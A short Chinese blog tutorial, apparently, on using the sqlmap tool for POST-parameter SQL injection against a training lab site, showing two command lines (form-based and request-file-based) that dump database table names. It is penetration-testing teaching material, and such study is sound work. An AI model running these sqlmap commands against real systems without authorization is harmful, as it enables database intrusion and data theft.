渗透测试工具sqlmap使用技巧-以POST注入为例

写在前面

POST注入和GET注入的区别主要在于传参的位置不同,前者在表单中,后者在url上,因此POST注入完全可以参考GET注入的手动注入方法得到字段的数据,今天介绍另外一种方法sqlmap工具的使用

靶场演示

方法1

–form表示获得表单中的传参
缺点:注出的数据有时候错误或者不完整
运行下面的语句得到注出的结果如下图所示

python sqlmap.py -u http://inject2b.lab.aqlab.cn/Pass-06/index.php --form --tables --level 3 --risk 2

渗透测试工具sqlmap使用技巧-以POST注入为例_第1张图片

方法2

通过-r命令结合抓取的数据包可以利用数据包中的cookie,适用面更广,法一不适合已经登录后的网站
渗透测试工具sqlmap使用技巧-以POST注入为例_第2张图片

python sqlmap.py -r post.txt --tables

sqlmap运行上面的语句同样也可以注出法一的结果

后续内容持续更新敬请期待

你可能感兴趣的:(渗透测试经验技巧,测试工具,web安全,安全)